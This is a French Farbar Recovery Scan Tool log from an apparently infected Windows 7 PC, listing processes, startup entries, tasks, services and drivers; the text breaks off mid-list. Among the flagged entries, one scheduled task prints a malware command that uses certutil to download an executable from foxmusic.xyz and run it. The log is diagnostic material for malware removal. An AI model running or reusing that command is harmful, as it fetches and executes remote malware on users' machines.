Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 3-07-2019 Exécuté par nathan (administrateur) sur NATHAN-PC (Micro-Star International Co., Ltd. MS-7B48) (04-07-2019 10:04:25) Exécuté depuis C:\Users\nathan\Desktop Profils chargés: nathan (Profils disponibles: nathan) Platform: Windows 7 Home Premium Service Pack 1 (X64) Langue: Français (France) Internet Explorer Version 11 (Navigateur par défaut: Chrome) Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) () [Fichier non signé] C:\Users\nathan\AppData\Roaming\Intel Rapid\IntelRapid.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc. -> Apple Inc.) D:\Jeux\iTunesHelper.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) D:\Jeux\Deamon tools\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) D:\Jeux\Deamon tools\DAEMON Tools Lite\DTShellHlp.exe (Electronic Arts, Inc. -> Electronic Arts) D:\Jeux\Origin\OriginWebHelperService.exe (EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe (EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe (EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\SpyHunter5.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chromeEmission.exe (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\RealTimeProtector.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFCore.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Smart Defrag\Pub\PubMonitor.exe (IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wscript.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe (philandro Software GmbH -> ) D:\Anydesk\AnyDesk.exe (Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe ==================== Registre (Avec liste blanche) =========================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [iTunesHelper] => D:\Jeux\iTunesHelper.exe [302904 2019-05-07] (Apple Inc. -> Apple Inc.) HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5262096 2019-05-22] (IObit Information Technology -> IObit) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [Advanced SystemCare 12] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3422480 2019-05-13] (IObit Information Technology -> IObit) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22695280 2019-06-18] (Piriform Software Ltd -> Piriform Software Ltd) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [HiddenWildflower] => C:\Windows\rss\csrss.exe [5254144 2019-07-04] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-28] () [Fichier non signé] HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-28] () [Fichier non signé] ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0D95180E-4797-42DE-B5E2-FF1A5E962978} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-06-10] (Google Inc -> Google Inc.) Task: {100FE05B-9D0C-4C11-85AE-23D4563A81C6} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [498976 2016-06-06] (IObit Information Technology -> IObit) Task: {1712E5A3-F794-454A-B438-6BF9E44A2825} - System32\Tasks\Intel Rapid => C:\Users\nathan\AppData\Roaming\Intel Rapid\IntelRapid.exe [424448 2019-06-29] () [Fichier non signé] Task: {1CB4CFEE-093C-41A0-B042-789507C0B885} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [897008 2019-06-18] (NVIDIA Corporation -> NVIDIA Corporation) Task: {1E8CAD90-6EBC-4B8E-9180-2ED1BF4D47CD} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130480 2019-06-18] (NVIDIA Corporation -> NVIDIA Corporation) Task: {2940B764-C2B2-4695-BC9D-A6D784B93ADE} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [668464 2017-02-24] (Intel(R) Trust Services -> Intel(R) Corporation) Task: {2B229831-EDDF-4776-A70F-0C4B7845D883} - System32\Tasks\ASC12_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [3164432 2019-06-25] (IObit Information Technology -> IObit) Task: {38024AB3-E93B-4030-A44A-8AB398C8A1E4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-06-18] (NVIDIA Corporation -> NVIDIA Corporation) Task: {3F7AE205-5504-439A-83B4-B3747E1D17C1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-06-10] (Google Inc -> Google Inc.) Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier <==== ATTENTION Task: {47B2BC48-95AD-439A-8F18-33442626100C} - System32\Tasks\Driver Booster SkipUAC (nathan) => C:\Program Files (x86)\IObit\Driver Booster\6.5.0\DriverBooster.exe [7614224 2019-06-18] (IObit Information Technology -> IObit) Task: {4F74EE7A-2465-4E3E-BC58-F15A91972E42} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.5.0\Scheduler.exe [149776 2019-06-18] (IObit Information Technology -> IObit) Task: {4FB4CC0C-CB8A-4869-8782-AB4EF8A03E11} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3788144 2019-06-18] (NVIDIA Corporation -> NVIDIA Corporation) Task: {60798B50-CA47-413C-85C9-482B2B2F622F} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-03-06] (NVIDIA Corporation -> NVIDIA Corporation) Task: {64E87BCA-91CA-470B-971F-9B74EEB6C5CE} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [897008 2019-06-18] (NVIDIA Corporation -> NVIDIA Corporation) Task: {69C12D35-FD8D-46CC-ADB2-AD765C9BCE7C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16667424 2019-06-18] (Piriform Software Ltd -> Piriform Software Ltd) Task: {952A3673-DA11-4B34-9B9D-6335EA0D8EDF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5254144 2019-07-04] () [Fichier non signé] <==== ATTENTION Task: {AC1F2303-9FC8-44A6-A906-874C326B0A76} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [6033680 2018-01-29] (IObit Information Technology -> IObit) Task: {ACE65BE7-7E48-49B9-B2FD-0301AF696B75} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-03-06] (NVIDIA Corporation -> NVIDIA Corporation) Task: {AEAF2660-0A9F-438D-8647-6284C6E96CDB} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-06-18] (Piriform Software Ltd -> Piriform Software Ltd) Task: {AEC03D16-BB8C-4551-8EFF-50A038132A5C} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.) Task: {B1B75A7B-676A-46B9-9F43-66D859659DDE} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2965792 2017-07-28] (IObit Information Technology -> IObit) Task: {BE3DBB1C-C85B-4A3F-9599-B423BF569BB9} - System32\Tasks\Uninstaller_SkipUac_nathan => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [5286672 2019-05-29] (IObit Information Technology -> IObit) Task: {BEA528FA-70FD-4F42-A7ED-AD0B54B8A7AF} - System32\Tasks\ASC12_SkipUac_nathan => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [8732432 2019-06-25] (IObit Information Technology -> IObit) Task: {C17E53B9-A9A1-48A5-81AE-0BAEBF62D066} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {CB892FE0-DADE-4ABA-AAE3-EE11DBAFA347} - System32\Tasks\IMF_SkipUAC_nathan => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5262096 2019-05-22] (IObit Information Technology -> IObit) Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf" (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{443EBDB6-9936-4C67-A742-0ADC6CBA192B}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/fr-fr/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2018-07-19] (IObit Information Technology -> IObit) BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_211\bin\ssv.dll [2019-06-10] (Oracle America, Inc. -> Oracle Corporation) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-06-10] (Oracle America, Inc. -> Oracle Corporation) BHO-x32: IObit Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll [2019-03-28] (IObit Information Technology -> IObit) FireFox: ======== FF Plugin: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-06-10] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-06-10] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin: @videolan.org/vlc,version=3.0.5 -> D:\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.6 -> D:\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC) Chrome: ======= CHR HomePage: Default -> hxxp://www.funnysearching.com/ CHR StartupUrls: Default -> "hxxp://google/" CHR DefaultSearchURL: Default -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=opensearch CHR DefaultSearchKeyword: Default -> ecosia.org CHR DefaultSuggestURL: Default -> hxxps://ac.ecosia.org/autocomplete?q={searchTerms}&type=list CHR Profile: C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default [2019-07-04] CHR Extension: (Slides) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-23] CHR Extension: (Docs) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-23] CHR Extension: (Google Drive) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-23] CHR Extension: (IObit Surfing Protection & Ads Removal) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbmegnmpleoagolcnjnejdacakedpcgd [2019-07-02] CHR Extension: (YouTube) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-23] CHR Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2019-04-20] CHR Extension: (Ecosia Search) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-01-24] CHR Extension: (Sheets) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-23] CHR Extension: (Google Docs hors connexion) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-13] CHR Extension: (AdBlock) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-05-28] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-23] CHR Extension: (Gmail) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-15] CHR Extension: (Chrome Media Router) - C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-21] ==================== Services (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) "yzrnpmcu" => service a été déverrouillé. <==== ATTENTION R2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [1269008 2019-05-08] (IObit Information Technology -> IObit) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3117648 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2888272 2019-05-04] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AnyDesk; D:\Anydesk\AnyDesk.exe [2935080 2019-05-29] (philandro Software GmbH -> ) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8403672 2019-06-07] (BattlEye Innovations e.K. -> ) R3 Disc Soft Lite Bus Service; D:\Jeux\Deamon tools\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [3638888 2018-05-30] (AVB Disc Soft, SIA -> Disc Soft Ltd) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [802432 2019-06-02] (EasyAntiCheat Oy -> EasyAntiCheat Ltd) R2 EsgShKernel; C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe [11457840 2019-07-03] (EnigmaSoft Limited -> EnigmaSoft Limited) S3 ICEsoundService; C:\Windows\system32\ICEsoundService64.exe [806352 2019-04-02] (ICEpower a/s -> ICEpower) R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFSrv.exe [2346256 2019-05-10] (IObit Information Technology -> IObit) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [732448 2017-02-24] (Intel(R) Trust Services -> Intel(R) Corporation) S2 Intel(R) TPM Provisioning Service; C:\Program Files\Intel\iCLS Client\TPMProvisioningService.exe [548648 2017-02-24] (Intel(R) Trust Services -> Intel(R) Corporation) S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [153360 2019-05-29] (IObit Information Technology -> IObit) S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [197264 2017-07-12] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-03-06] (NVIDIA Corporation -> NVIDIA Corporation) S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-03-06] (NVIDIA Corporation -> NVIDIA Corporation) S3 Origin Client Service; D:\Jeux\Origin\OriginClientService.exe [2329392 2019-06-11] (Electronic Arts, Inc. -> Electronic Arts) R2 Origin Web Helper Service; D:\Jeux\Origin\OriginWebHelperService.exe [3203888 2019-06-11] (Electronic Arts, Inc. -> Electronic Arts) R2 ShMonitor; C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe [512816 2019-07-03] (EnigmaSoft Limited -> EnigmaSoft Limited) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation) R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé) <==== ATTENTION (Accès refusé) S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier) R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r ===================== Pilotes (Avec liste blanche) ====================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R1 8f00b204e9800998; C:\Windows\system32\drivers\8f00b204e9800998.sys [30912 2019-06-29] (BlockChain Advances Ltd -> FsFilter Network) R3 AscFileControl; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [22440 2018-09-20] (IObit Information Technology -> IObit) R3 AscFileFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [25512 2018-09-20] (IObit Information Technology -> IObit) R3 AscRegistryFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [25000 2018-07-04] (IObit Information Technology -> IObit) S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2018-06-13] (Disc Soft Ltd -> Disc Soft Ltd) R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2018-06-13] (Disc Soft Ltd -> Disc Soft Ltd) R3 EnigmaFileMonDriver; C:\Windows\System32\drivers\EnigmaFileMonDriver.sys [68424 2019-07-04] (EnigmaSoft Limited -> EnigmaSoft Limited) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2018-06-11] (Martin Malik - REALiX -> REALiX(tm)) R0 iaStorAC; C:\Windows\System32\DRIVERS\iaStorAC.sys [906160 2019-05-31] (Intel(R) Rapid Storage Technology -> Intel Corporation) R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [37808 2019-05-31] (Intel(R) Rapid Storage Technology -> Intel Corporation) R3 IMFDownProtect; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFDownProtect.sys [21928 2018-12-06] (IObit Information Technology -> IObit) R3 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [22440 2018-12-06] (IObit Information Technology -> IObit) R3 IMFForceDelete; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFForceDelete.sys [16216 2018-12-06] (IObit Information Technology -> IObit) R3 ImfObCallback; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\ImfObCallback.sys [19312 2018-12-06] (IObit Information Technology -> IObit) R2 ImfPfFilter; C:\Windows\system32\drivers\imfpffilter.sys [70240 2019-01-21] (IObit CO., LTD -> IObit) S3 iobit_monitor_server; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [14680 2018-07-04] (IObit Information Technology -> IObit) S4 IUFileFilter; pas de ImagePath R3 IUProcessFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUProcessFilter.sys [19312 2019-05-29] (IObit Information Technology -> IObit) R3 IURegistryFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IURegistryFilter.sys [25488 2019-05-29] (IObit Information Technology -> IObit) R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [249000 2019-05-31] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-06-13] (NVIDIA Corporation -> NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation) R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation) R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [35800 2018-12-06] (IObit Information Technology -> IObit) R0 SmartDefragDriver; 